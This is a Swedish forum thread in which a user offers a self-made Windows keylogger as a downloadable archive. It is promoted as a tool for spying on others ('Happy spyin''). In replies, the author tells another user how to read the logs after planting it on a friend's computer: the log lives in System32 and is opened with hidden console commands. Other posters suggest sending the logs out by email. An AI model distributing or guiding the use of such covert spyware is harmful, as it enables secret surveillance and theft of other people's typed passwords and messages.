En keylogger till dom som vill ha. (hemsnickrad)
Suttit uppe nu i c.a två nätter. Inte haft något att göra så jag gjorde en nätt keylogger :Dhttp://www.m-logic.se/M-Logic_Software_Keylogger.rar Läs readme filen först innan nu börjar använda det. Och nej, det finns ingen bakdörr in i den, den arbetar inte ens mot nätverket. Ge gärna lite kritik och så, vad som skulle kunna bli bättre o.s.v. Happy spyin'! =)
För skåne! svenskjävel!
Obs. endast till windows NT/XP och högre.
För skåne! svenskjävel!
inte för att jag värkar elak eller något men litar inte riktigt på det.. keylogger, det kan handla om jävligt mycket för mig =/ så passar gärna, dock snyggt gort :)
"Vet du hur man ser att det är en sverigedemokrat som skapat tråden? * Särskrivningar och allmänt illa vårdat skriftspråk. * Ovidkommande babbel om pöbel, svartingar, negrer, hasch, och kommunister."
såja nu funkar länken igen.. Fatcaesar: haha jadu, det är ju upp till dig. Men som jag skrev, den innehåller inget skadligt.
För skåne! svenskjävel!
Vad är en keylogger?
"Bara för att du är paranoid betyder inte det att ingen jagar dig."
en keylogger är ett program som registrerar alla tangenttryckningar som personer gör vid datorn, oavsett var. Om det är här, eller när du skriver på MSN. Den sparar allting i en fil som man senare kan läsa relativt begripligt. (ni blir förvånade när ni ser hur man egentligen trycker på sitt tangentbord). Kan vara bra för att spionera på andra.. Programmer är nämligen inte synligt innan man plockar fram det, mer om det i readmefilen.
För skåne! svenskjävel!
den gäller på alla användare =) så länge som du är administratör så kommer den fungera på alla andra :P
För skåne! svenskjävel!
Rätt intressant att inte fler folk är intresserade av något sånt här :P
För skåne! svenskjävel!
hehe då får du ju tips dom ;)
För skåne! svenskjävel!
Vad ska man med en keylogger till om den inte ringer hem? behövs inte ens bakdörr för det, man kan skicka det som epost eller via IRC eller http eller vad som helst, att lägga en fönsterkrok i windows och ta upp tangenttryckningar kallar jag snarare för en osynlig ordbehandlare :)
max_p: du är lite som en ängel, har letat ett bra tag efter en schysst keylogger, dom flesta kostar pengar å jag hittar inga cracks, det här e givet! tack för intiativet!
http://www.sthlmmd.se
Det är ju inget nytt under solen :) Finns ju tonvis med keyloggers redan. Gällande varför inte fler tycks vara intresserade dvs. Men en till skadar väl inte ^^
Look with your own eyes - See with your own mind
hehe nä jag tänkte bara om något ville ha.. ville testa mina kunskaper lite så tja.. :P absolut: javisst, det hade inte varit speciellt svårt att implementera, men så fort man gör det så börjar brandväggar varna, krångla och massa mög, så jag struntade i det =P
För skåne! svenskjävel!
om man får in en keylogger på en polares dator. måste man sen komma dit några dagar senare å kopiera log filen å maila sig själv ex. för att se det?
Denna användare har skrivit alla inlägg där användaren har tagits bort från whoa.
Lebanner: ja, det måste man.. filen ligger i Windows/System32/<namn på användaren>.joo =) Du kan också välja att skriva <space><password>-showfile för att titta på den bara.
För skåne! svenskjävel!
Lebanner P21 Inte om du har en bättre variant av keylogge, då skickar den email till din epost med logg filen istället var tionde minut eller beronde på vad du anger.
Atomizer: ja i samband med att brandväggen varnar för ny e-postclient är skapad.. dom är inte dumma mään.
För skåne! svenskjävel!
fattar inget..har lagt den på skrivbordet och dubbelklickat, skrev in password och den försvann, nu ligger den på system32, men var fan ska man se loggen och var skriver jag allt detdär <space><password>-showfile? :S
Error: KeyBoard Missing. Press Any Key To Continue.
BeharFaca: precis var du vill kan du skriva det =)
För skåne! svenskjävel!
<space> är ett kommando till consolen att den ska förbereda sig för ett lösenord (alltså ett vanligt mellanslag) följt med ditt lösenord för att authentisera att du har tillåtelse att köra kommando, följt med ett vanligt - (bindesträck) och sen följt med kommandot showfile, xa, eller terminate =) vet inte hur jag ska förklara det annars =P och det går att skriva till exempel här när man sitter och skriver ett meddelande till forumet på whoa :P
För skåne! svenskjävel!
behöver man inte ha nått öppet..kan jag göra det i notepad?
det funkar inte..får inte framnånting..kolla hello-xa det hände inget :S
bara skojjar det funkade nu..hade lite för många crsms i aktivitetshanteraren..hehe tack max
Jag har dubbelklickat på crsms i system32. Inget händer? Har skrivit i lösen "nyår" så nu ska jag alltså göra vad? ursäkta. BÄÄRRSA!
lära utan att tänka är meningslöst, att tänka utan att lära är farligt. (Kung Fu Tse, Kina)
Fattar ingenting. !
lära utan att tänka är meningslöst, att tänka utan att lära är farligt. (Kung Fu Tse, Kina)
Lyckas ej, snälla vad kan vara fel? Ör det nån som har lyckats?
Har aldrig fått en smäll, inte ens tanken har slagit mej
lol nu funkar det :D Kan dett alltid vara öppet? Startar det med windows?
inget problem för mig till er andra: rtfm
kommer det att starta med windows?
Fattar inte hur den fukar asså.
...och det är det som är så fint med whoa!
Roligt att kolla resultat, väldigt simpel att använda, sjysst verkligen.
Konstigt, alla dina flickvänner säljer sig för en mosbricka.
Jag får den fan inte att funka..=/ Jag har inte operativsystemet på C, kan det vara orsaken? Vill iaf inte att det ska vara något som gömmer sig lång inne i hårddisken och stjäler plats om jag inte kan använda den..=/
<3
Tror att max får ta en ordentlig genomgång om hans program för oss noobs
haha jisses! det är verkligen ett enkelt program. Du behöver bara klicka på programmet en enda gång (om det är igång mer än en crsms samtidigt kommer du inte komma in i konsollen) så kolla det med CTRL+ALT+DELETE och processer. (om inget annat starta bara om datorn. <space><password>-xa menas _INTE_ med att det är " hello-xa" om ni inte har hello som password :P Jontish, ja det skulle nog kunna vara det, har för mig att jag råkade definera att det var tvunget att ligga på C:\ :/ Sorry. Tänkte mig inte riktigt för där.´får fixa det i nästa version! skottis: kan säga som så att manualen är väldigt genomgående. Ni som inte tycker det (men har lärt er endå) skriv gärna här vad jag behöver skriva till :)
För skåne! svenskjävel!
hehe fick alla rätt på det?
För skåne! svenskjävel!
får det inte att funka, hur tar jag bort skiten?
shit va folk är färska, faktiskt: om ni inte vet hur man använder programmet eller inte vet hur man tar bort det, då ska ni faktiskt inte använda sånt här.
puszel P20 Jaja du är bäst i världen, hur får jag bort skiten? Jag lovar att inte använda sånna program igen Pappa.
läs readmen, där ser du att den skapar en fil som lägger sig i system32 mappen, ta bort den. kör msconfig å ta bort autostarten på programmet med samma namn som filen det är okej son, i forgive
puszel: woord på den! =) haha verkligen ett bra svar :D
För skåne! svenskjävel!
Syns den i tray? Är det lösen på den?
Denna användare har skrivit alla inlägg där användaren har tagits bort från whoa.
Funkar fint för mig. Dock kan jag inte kolla loggen med " lösen-showfile" utan måste använda " lösen-xa" för att kika.
Iklädd lappmössa höjde Skellefteås lagkapten Hardy Nilsson SM-bucklan inför 12000 åskådare i Scandinavium och miljontals tv-tittare. Äntligen fick Skellefteå AIK sitt första SM-guld i ishockey!
länken är död, och jag behöver verkligen denna! någon som har installfilen kvar/trådskaparen kan uppdatera länken eller något?
"People are always like; 'Why you never smile in pictures? Cause there aint that much to smile about, I'm dead serious about this." - Papoose
Jag kan hosta den på min server bara jag får den och får skaparens tillstånd :) Jag vill ha den :)
http://yofosho.mine.nu